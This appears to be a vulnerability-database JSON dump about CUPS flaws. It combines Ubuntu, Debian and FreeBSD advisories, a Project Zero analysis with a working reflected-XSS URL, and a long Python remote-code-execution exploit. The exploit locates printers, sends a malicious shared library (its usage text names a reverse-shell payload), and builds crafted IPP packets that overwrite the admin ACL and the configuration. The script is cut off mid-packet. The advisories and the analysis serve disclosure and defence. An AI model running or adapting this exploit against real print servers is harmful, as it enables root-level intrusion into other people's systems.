updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.04:\r\n cups 2.0.2-1ubuntu3.1\r\n\r\nUbuntu 14.10:\r\n cups 1.7.5-3ubuntu3.2\r\n\r\nUbuntu 14.04 LTS:\r\n cups 1.7.2-0ubuntu1.6\r\n\r\nUbuntu 12.04 LTS:\r\n cups 1.5.3-0ubuntu8.7\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2629-1\r\n CVE-2015-1158, CVE-2015-1159\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/cups/2.0.2-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/cups/1.7.5-3ubuntu3.2\r\n https://launchpad.net/ubuntu/+source/cups/1.7.2-0ubuntu1.6\r\n https://launchpad.net/ubuntu/+source/cups/1.5.3-0ubuntu8.7\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-06-14T00:00:00", "title": "[USN-2629-1] CUPS vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:59", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-14T00:00:00", "id": "SECURITYVULNS:DOC:32208", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32208", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32208"], "description": "Code execution, crossite scripting.", "edition": 1, "reporter": "UBUNTU", "published": "2015-06-14T00:00:00", "title": "CUPS security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:00", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "cups", "version": "2.0", "operator": "eq"}], "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-14T00:00:00", "id": "SECURITYVULNS:VULN:14537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14537", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:57", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3172-1 security@debian.org\r\nhttp://www.debian.org/security/ Sebastien Delafond\r\nFebruary 25, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : cups\r\nCVE ID : CVE-2014-9679\r\nDebian Bug : 778387\r\n\r\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\r\nSystem, did not correctly parse compressed raster files. By submitting\r\na specially crafted raster file, a remote attacker could use this\r\nvulnerability to trigger a buffer overflow.\r\n\r\nFor the stable distribution &#40;wheezy&#41;, this problem has been fixed in\r\nversion 1.5.3-5+deb7u5.\r\n\r\nFor the upcoming stable distribution &#40;jessie&#41; and unstable\r\ndistribution &#40;sid&#41;, this problem has been fixed in version 1.7.5-11.\r\n\r\nWe recommend that you upgrade your cups packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2\r\n\r\niQEcBAEBCAAGBQJU7aoLAAoJEBC+iYPz1Z1kU2YH/3NDe8zgtSe16sgOYxRCnIA5\r\n8JzBeGywAW2g9+hRvTYX3N6s9XwnDddkIhM9XcBF2t2u/w7zEHfMtrwI1AiUF6rR\r\n34lNihMhDnlTSnPhYVtb/aKFJbMd7iZFgm+ctwm1n4G1pVID78dbL2BxhrQCsMLJ\r\niLoffeDcCbyzPp0MZSGhpbrXzTUTCOXxeBTMN34ONcShJ0NBiEkQGCyj4AyUpb1h\r\nKo/v28cmPLT6jFY8Avx7rYMo8YNPP6HcF/i9w/gC+A//tzVx6qb4WxXDKDYs5VNW\r\n3yFL6DHrKPdYTgzQk/K9Hq/fqdJTBKDZ13sWJVwsV6GuCUAUFgl0OxALSFGN8Lo=\r\n=EW8H\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-03-07T00:00:00", "title": "[SECURITY] [DSA 3172-1] cups security update", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:57", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-9679"], "modified": "2015-03-07T00:00:00", "id": "SECURITYVULNS:DOC:31770", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31770", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:59", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31770"], "description": "Integer overflow on compressed raster files parsing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-03-07T00:00:00", "title": "CUPS integer overflow", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:59", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "cups", "version": "2.0", "operator": "eq"}], "cvelist": ["CVE-2014-9679"], "modified": "2015-03-07T00:00:00", "id": "SECURITYVULNS:VULN:14295", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14295", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:40", "references": ["https://www.kb.cert.org/vuls/id/810572", "https://cups.org/blog.php?L1082"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups-base", "operator": "lt"}], "description": "\nCUPS development team reports:\n\nThe new release addresses two security vulnerabilities,\n\t add localizations for German and Russian, and includes\n\t several general bug fixes. Changes include:\nSecurity: Fixed CERT VU #810572/CVE-2015-1158/CVE-2015-1159\n\t exploiting the dynamic linker (STR #4609)\nSecurity: The scheduler could hang with malformed\n\t gzip data (STR #4602)\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2015-06-09T00:00:00", "title": "cups -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-09T00:00:00", "id": "A40EC970-0EFA-11E5-90E4-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/a40ec970-0efa-11e5-90e4-d050996490d0.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "references": [], "edition": 1, "description": "", "reporter": "Google Security Research", "published": "2015-06-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "CUPS XSS / String Handling / Improper Teardown", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-22T00:00:00", "href": "https://packetstormsecurity.com/files/132389/CUPS-XSS-String-Handling-Improper-Teardown.html", "id": "PACKETSTORM:132389", "sourceData": "`Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html \n \nAbstract \n \nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers. \n \nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation. \n \nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation. \n \nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same. \n \nSummary \n \nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code. \n \nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. \n \nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations. \nBackground \n \nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158) \n \nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'. \n \nscheduler/ipp.c:1626: \n \n/* \n* Free old strings\u2026 \u2190 Even 'old' strings need to be freed. \n*/ \n \nfor (i = 0; i < attr->num_values; i ++) \n{ \n_cupsStrFree(attr->values[i].string.text); \nattr->values[i].string.text = NULL; \nif (attr->values[i].string.language) \u2190 for all values in an attribute \n{ \n_cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string \nattr->values[i].string.language = NULL; \n} \n} \n \nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request. \n \nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times. \n \nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations. \n \nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build. \n \n \nA Reflected XSS in the Web Interface (CVE-2015-1159) \n \nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'. \n \nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting. \n \nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters: \n<>\"'& \n \nThese are replaced with their HTML entity equivalents ('<' etc...). \n \nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650: \n \nif (*s == '<') \n{ \n/* \n* Pass <A HREF=\"url\"> and </A>, otherwise quote it... \n*/ \n \nif (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9)) \n{ \nfputs(\"<A HREF=\\\"\", out); \ns += 9; \n \nwhile (*s && *s != '\\\"') \n{ \nif (*s == '&') \nfputs(\"&\", out); \nelse \nputc(*s, out); \n \ns ++; \n} \n \nif (*s) \ns ++; \n \nfputs(\"\\\">\", out); \n} \n \nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context. \n \nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue. \n \nTake this example from templates/help-header.tmp:19: \n \n<P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P> \n \nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags. \n \nRequesting the following URI will demonstrate this reflected XSS: \nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search \n \nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors. \n \n \nUpstream Fixes \n \nApple Fix (April 16, 2015): \nhttps://support.apple.com/kb/DL1807 \n \nOfficial CUPS fix for downstream vendors (June 8, 2015): \nhttps://www.cups.org/str.php?L4609 \nhttp://www.cups.org/blog.php?L1082+I0+Q \n \nProject Zero Bug \n \nFor those interested, the sample exploit can be found here: \n \nhttps://code.google.com/p/google-security-research/issues/detail?id=455 \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz \n \nDisclosure Timeline \n \nMarch 20th, 2015 - Initial notification to Apple \nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3 \nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3 \nJune 18th, 2015 - Disclosure + 90 days \nJune 19th, 2015 - P0 publication \n \nAttack Surface Reduction in CUPS 2.0.3+ \n \nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs: \n \nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead. \nLD_* and DYLD_* environment variables are blocked when CUPS is running as root. \nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only). \n \nAcknowledgements \n \nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits. \n \nConclusion \n \nNo one prints anything anymore anyways. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132389/cups-xss.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-03T17:04:32", "references": [], "edition": 1, "description": "", "reporter": "0x00string", "published": "2017-02-03T00:00:00", "type": "packetstorm", "title": "CUPS Remote Code Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "href": "https://packetstormsecurity.com/files/140920/CUPS-Remote-Code-Execution.html", "id": "PACKETSTORM:140920", "sourceData": "`#!/usr/bin/python \n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution \n# Google Dork: n/a \n# Date: 2/2/17 \n# Exploit Author: @0x00string \n# Vendor Homepage: cups.org \n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2 \n# Version: <2.0.3 \n# Tested on: Ubuntu 14/15 \n# CVE : CVE-2015-1158 \nimport os, re, socket, random, time, getopt, sys \nfrom socket import * \nfrom struct import * \n \ndef banner(): \nprint ''' \nlol ty google \n0000000000000 \n0000000000000000000 00 \n00000000000000000000000000000 \n0000000000000000000000000000000 \n000000000 0000000000 \n00000000 0000000000 \n0000000 000000000000 \n0000000 000000000000000 \n000000 000000000 000000 \n0000000 000000000 000000 \n000000 000000000 000000 \n000000 000000000 000000 \n000000 00000000 000000 \n000000 000000000 000000 \n0000000 000000000 0000000 \n000000 000000000 000000 \n0000000000000000 0000000 \n0000000000000 0000000 \n00000000000 00000000 \n00000000000 000000000 \n0000000000000000000000000000000 \n00000000000000000000000000000 \n000 0000000000000000000 \n0000000000000 \n@0x00string \ngithub.com/0x00string/oldays/CVE-2015-1158.py \n''' \n \ndef usage (): \nprint (\"python script.py <args>\\n\" \n\" -h, --help: Show this message\\n\" \n\" -a, --rhost: Target IP address\\n\" \n\" -b, --rport: Target IPP service port\\n\" \n\" -c, --lib /path/to/payload.so\\n\" \n\" -f, --stomp-only Only stomp the ACL (no postex)\\n\" \n\"\\n\" \n\"Examples:\\n\" \n\"python script.py -a 10.10.10.10 -b 631 -f\\n\" \n\"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\") \nexit() \n \ndef pretty (t, m): \nif (t is \"+\"): \nprint \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"-\"): \nprint \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"*\"): \nprint \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"!\"): \nprint \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\", \n \ndef createDump (input): \nd, b, h = '', [], [] \nu = list(input) \nfor e in u: \nh.append(e.encode(\"hex\")) \nif e == '0x0': \nb.append('0') \nelif 30 > ord(e) or ord(e) > 128: \nb.append('.') \nelif 30 < ord(e) or ord(e) < 128: \nb.append(e) \n \ni = 0 \nwhile i < len(h): \nif (len(h) - i ) >= 16: \nd += ' '.join(h[i:i+16]) \nd += \" \" \nd += ' '.join(b[i:i+16]) \nd += \"\\n\" \ni = i + 16 \nelse: \nd += ' '.join(h[i:(len(h) - 0 )]) \npad = len(' '.join(h[i:(len(h) - 0 )])) \nd += ' ' * (56 - pad) \nd += ' '.join(b[i:(len(h) - 0 )]) \nd += \"\\n\" \ni = i + len(h) \n \nreturn d \n \nclass tcpsock: \ndef __init__(self, sock=None): \nif sock is None: \nself.sock = socket( \nAF_INET, SOCK_STREAM) \nself.sock.settimeout(30) \nelse: \nself.sock = sock \ndef connect(self, host, port): \nself.sock.connect((host, int(port))) \ndef tx(self, msg): \nself.sock.send(msg) \ndef rx(self): \ntmp = self.sock.recv(1024) \nmsg = \"\" \nwhile tmp: \nmsg += tmp \ntmp = self.sock.recv(1024) \nreturn msg \n \ndef txrx (ip, port, proto, txpacket): \nif (proto is \"tcp\"): \nsock = tcpsock() \nelif (proto is \"udp\"): \nsock = udpsock() \nelse: \nreturn None \nsock.connect(ip, port) \nsock.tx(txpacket) \nrxpacket = sock.rx() \nreturn rxpacket \n \ndef locatePrinters(rhost, rport=\"631\"): \nrequest = ( \"GET /printers HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"\\x0d\\x0a\") \nresponse = txrx(rhost, int(rport), \"tcp\", request) \nif response is not None: \nm = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response) \nif m is not None: \nprinter = m.group(1) \npretty(\"+\",\"printer found: \" + printer) \nelse: \npretty(\"-\",\"no printers\") \nexit(1) \nreturn printer \n \ndef preparePayload(libpath): \nwith open(libpath, 'rb') as f: \npayload = f.read() \nif payload is not None: \npretty(\"*\",\"Payload:\\n\" + createDump(payload)) \nelse: \npretty(\"-\",\"something went wrong\") \nusage() \nreturn payload \n \ndef seedTarget(rhost, rport, printer, payload): \ni = random.randint(1,3) \nreqid = str(pack(\">i\",(i+2))) \nreqid2 = str(pack(\">i\",(i+3))) \nprinter_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer \n \ncreate_job_packet = (\"\\x02\\x00\" \n\"\\x00\\x05\"+ \nreqid+ \n\"\\x01\" \n\"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\" \n\"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\" \n\"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri + \n\"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\" \n\"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\" \n\"\\x02\" \n\"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\" \n\"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\" \n\"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\" \n\"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\" \n\"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\" \n\"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\" \n\"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\" \n\"\\x03\") \npretty(\"*\",\"Sending createJob\") \n \nhttp_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \ncreateJobRequest = http_header1 + create_job_packet \nblah = txrx(rhost,int(rport),\"tcp\",createJobRequest) \nif blah is not None: \nm = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah) \nif m is not None: \njobid = m.group(1) \nelse: \npretty(\"-\",\"something went wrong\"); \nexit() \n \npretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\") \npretty(\"*\", \"Sending sendJob\") \n \nsend_document_packet = (\"\\x02\\x00\" \n\"\\x00\\x06\"+ \nreqid2+ \n\"\\x01\" \n\"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\" \n\"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\" \n\"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri + \n\"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) + \n\"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\" \n\"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\" \n\"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\" \n\"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\" \n\"\\x03\"+ \npayload) \n \nhttp_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \nsendJobRequest = http_header2 + send_document_packet \nblah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest) \npretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\") \npretty(\"*\",\"job id: \" + jobid) \nreturn jobid \n \ndef stompACL(rhost, rport, printer): \ni = random.randint(1,1024) \nprinter_url = \"ipp://\" + rhost + \":\" + rport + printer \n \nadmin_stomp = (\"\\x02\\x00\" # vers 2.0 \n\"\\x00\\x05\"+ # op id: Create Job (0x0005) \nstr(pack(\">i\",(i+1)))+ \n\"\\x01\" # op attributes marker \n\"\\x47\" # charset \n\"\\x00\\x12\" # name len: 18 \n\"attributes-charset\" \n\"\\x00\\x08\" # val len: 8 \n\"us-ascii\" \n\"\\x48\" # natural language \n\"\\x00\\x1b\" # name len: 27 \n\"attributes-natural-language\" \n\"\\x00\\x06\" # val len: 6 \n\"/admin\" \n\"\\x45\" # printer-uri \n\"\\x00\\x0b\" # name len 11 \n\"printer-uri\" + \nstr(pack(\">h\", len(printer_url))) + printer_url + \n\"\\x42\" # name without lang \n\"\\x00\\x14\" # name len: 20 \n\"requesting-user-name\" \n\"\\x00\\x06\" # val len: 6 \n\"/admin\" \n\"\\x02\" # job attrs marker \n\"\\x21\" # integer \n\"\\x00\\x06\" # name len: 6 \n\"copies\" \n\"\\x00\\x04\" # val len: 4 \n\"\\x00\\x00\\x00\\x01\" # 1 \n\"\\x42\" # name w/o lang \n\"\\x00\\x19\" # name len: 25 \n\"job-originating-host-name\" \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x36\" # nwl \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x16\" # val len: 22 \n\"\\x00\\x06\" # length \n\"/admin\" \n\"\\x00\\x0c\" \n\"BBBBBBBBBBBB\" \n\"\\x03\") # end of attributes \n \nconf_stomp = (\"\\x02\\x00\" # vers 2.0 \n\"\\x00\\x05\"+ # op id: Create Job (0x0005) \nstr(pack(\">i\",(i+2)))+ \n\"\\x01\" # op attributes marker \n\"\\x47\" # charset \n\"\\x00\\x12\" # name len: 18 \n\"attributes-charset\" \n\"\\x00\\x08\" # val len: 8 \n\"us-ascii\" \n\"\\x48\" # natural language \n\"\\x00\\x1b\" # name len: 27 \n\"attributes-natural-language\" \n\"\\x00\\x0b\" # val len: 11 \n\"/admin/conf\" \n\"\\x45\" # printer-uri \n\"\\x00\\x0b\" # name len 11 \n\"printer-uri\" + \nstr(pack(\">h\", len(printer_url))) + printer_url + \n\"\\x42\" # name without lang \n\"\\x00\\x14\" # name len: 20 \n\"requesting-user-name\" \n\"\\x00\\x0b\" # val len: 11 \n\"/admin/conf\" \n\"\\x02\" # job attrs marker \n\"\\x21\" # integer \n\"\\x00\\x06\" # name len: 6 \n\"copies\" \n\"\\x00\\x04\" # val len: 4 \n\"\\x00\\x00\\x00\\x01\" # 1 \n\"\\x42\" # name w/o lang \n\"\\x00\\x19\" # name len: 25 \n\"job-originating-host-name\" \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol 